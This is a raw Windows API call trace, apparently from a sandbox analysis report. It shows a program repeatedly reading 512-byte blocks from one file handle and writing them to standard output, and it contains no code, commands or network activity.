[0216.877] GetFileType (hFile=0x50) returned 0x1 [0216.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.878] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.878] GetFileType (hFile=0x50) returned 0x1 [0216.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.878] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.878] GetFileType (hFile=0x50) returned 0x1 [0216.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.878] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.878] GetFileType (hFile=0x50) returned 0x1 [0216.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.878] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.878] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.878] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.878] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.878] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.878] GetFileType (hFile=0x50) returned 0x1 [0216.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.878] GetFileType (hFile=0x50) returned 0x1 [0216.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.878] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.878] GetFileType (hFile=0x50) returned 0x1 [0216.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.878] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.878] GetFileType (hFile=0x50) returned 0x1 [0216.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.879] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.879] GetFileType (hFile=0x50) returned 0x1 [0216.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.879] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.879] GetFileType (hFile=0x50) returned 0x1 [0216.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.879] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.879] GetFileType (hFile=0x50) returned 0x1 [0216.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.879] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.879] GetFileType (hFile=0x50) returned 0x1 [0216.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.879] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.879] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.879] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.879] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.879] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.879] GetFileType (hFile=0x50) returned 0x1 [0216.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.879] GetFileType (hFile=0x50) returned 0x1 [0216.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.879] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.879] GetFileType (hFile=0x50) returned 0x1 [0216.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.880] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.880] GetFileType (hFile=0x50) returned 0x1 [0216.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.880] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.880] GetFileType (hFile=0x50) returned 0x1 [0216.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.880] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.880] GetFileType (hFile=0x50) returned 0x1 [0216.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.880] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.880] GetFileType (hFile=0x50) returned 0x1 [0216.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.880] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.880] GetFileType (hFile=0x50) returned 0x1 [0216.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.880] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.880] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.881] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.881] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.881] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.881] GetFileType (hFile=0x50) returned 0x1 [0216.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.881] GetFileType (hFile=0x50) returned 0x1 [0216.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.881] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.881] GetFileType (hFile=0x50) returned 0x1 [0216.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.881] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.881] GetFileType (hFile=0x50) returned 0x1 [0216.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.881] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.881] GetFileType (hFile=0x50) returned 0x1 [0216.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.881] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.881] GetFileType (hFile=0x50) returned 0x1 [0216.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.882] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.882] GetFileType (hFile=0x50) returned 0x1 [0216.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.882] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.882] GetFileType (hFile=0x50) returned 0x1 [0216.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.882] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.882] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.882] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.882] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.882] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.882] GetFileType (hFile=0x50) returned 0x1 [0216.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.882] GetFileType (hFile=0x50) returned 0x1 [0216.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.882] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.883] GetFileType (hFile=0x50) returned 0x1 [0216.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.883] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.883] GetFileType (hFile=0x50) returned 0x1 [0216.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.883] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.883] GetFileType (hFile=0x50) returned 0x1 [0216.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.883] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.883] GetFileType (hFile=0x50) returned 0x1 [0216.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.883] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.883] GetFileType (hFile=0x50) returned 0x1 [0216.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.883] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.883] GetFileType (hFile=0x50) returned 0x1 [0216.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.884] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.884] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.884] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.884] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.884] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.884] GetFileType (hFile=0x50) returned 0x1 [0216.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.884] GetFileType (hFile=0x50) returned 0x1 [0216.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.884] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.884] GetFileType (hFile=0x50) returned 0x1 [0216.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.884] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.884] GetFileType (hFile=0x50) returned 0x1 [0216.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.884] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.884] GetFileType (hFile=0x50) returned 0x1 [0216.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.885] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.885] GetFileType (hFile=0x50) returned 0x1 [0216.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.885] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.885] GetFileType (hFile=0x50) returned 0x1 [0216.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.885] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.885] GetFileType (hFile=0x50) returned 0x1 [0216.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.885] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.885] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.885] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.885] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.885] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.885] GetFileType (hFile=0x50) returned 0x1 [0216.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.885] GetFileType (hFile=0x50) returned 0x1 [0216.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.886] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.886] GetFileType (hFile=0x50) returned 0x1 [0216.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.886] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.886] GetFileType (hFile=0x50) returned 0x1 [0216.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.886] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.886] GetFileType (hFile=0x50) returned 0x1 [0216.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.886] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.886] GetFileType (hFile=0x50) returned 0x1 [0216.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.886] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.886] GetFileType (hFile=0x50) returned 0x1 [0216.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.886] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.887] GetFileType (hFile=0x50) returned 0x1 [0216.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.887] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.887] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.887] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.887] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.887] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.887] GetFileType (hFile=0x50) returned 0x1 [0216.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.887] GetFileType (hFile=0x50) returned 0x1 [0216.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.887] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.887] GetFileType (hFile=0x50) returned 0x1 [0216.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.887] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.887] GetFileType (hFile=0x50) returned 0x1 [0216.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.887] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.888] GetFileType (hFile=0x50) returned 0x1 [0216.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.888] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.888] GetFileType (hFile=0x50) returned 0x1 [0216.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.888] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.888] GetFileType (hFile=0x50) returned 0x1 [0216.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.888] 